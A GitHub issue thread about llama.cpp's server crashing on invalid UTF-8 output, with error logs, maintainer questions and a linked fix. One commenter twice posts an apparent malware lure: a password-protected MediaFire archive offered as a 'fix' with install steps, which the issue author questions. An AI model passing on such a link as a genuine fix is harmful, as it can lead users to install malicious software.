### ISSUE TITLE
Bug: Regular crashes due to invalid UTF-8 in output.

### ISSUE THREAD

**Issue by kaetemi** [ggerganov/llama.cpp#9195]
### What happened?

Llama.cpp crashes several times a day due to invalid UTF-8 in its output in /completion endpoint.

Ideally this should just return an error code.

### Name and Version

latest

### Relevant log output

```shell
llama-server [falcon-7b:2048:10]: terminate called after throwing an instance of 'nlohmann::json_abi_v3_11_3::detail::type_error'
llama-server [falcon-7b:2048:10]:   what():  [json.exception.type_error.316] invalid UTF-8 byte at index 612: 0x5C
Error in request to /completion: socket hang up
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kaetemi** [comment]
@amir1387aht Uh, not sure if RARs on MediaFire are the right way to share bugfixes.

**Comment by kaetemi** [comment]
Hmm. Seems to be elsewhere...

**Comment by kaetemi** [comment]
So far, so good...

**Comment by ngxson** [comment]
Could you include an example of the request sent to `/completion`?

**Comment by kaetemi** [comment]
Requests are done in token array format. The input is sanitized. Request has Japanese unicode, and output is likely unicode but possibly not coherent (Falcon 7B is not coherent at unicode output) and might've been cut short due to generation length limit.

**Comment by ngxson** [comment]
Can you just give an example of which Japanese character / sentence which causes the crash? If we have a concrete example, it would be much simple to pin-point the error.

**Comment by kaetemi** [comment]
I don't have any log of the specific output that crashes it, no user content is logged on my inference servers.

**Comment by kaetemi** [comment]
Hmm. Just got another crash with the same error.

**Comment by kaetemi** [comment]
Oh. The calls in completion already have `replace` as error handler. So it's not those then, huh.

**Comment by kaetemi** [comment]
![image](https://github.com/user-attachments/assets/e5a54b98-a138-41fc-b450-ec0e1765911a)

Oh...

**Comment by kaetemi** [comment]
So far, so good...

**Comment by kaetemi** [comment]
https://github.com/ggerganov/llama.cpp/pull/9210

**Comment by kaetemi** [comment]
Will open a separate issue for error output that contains UTF-8 characters.
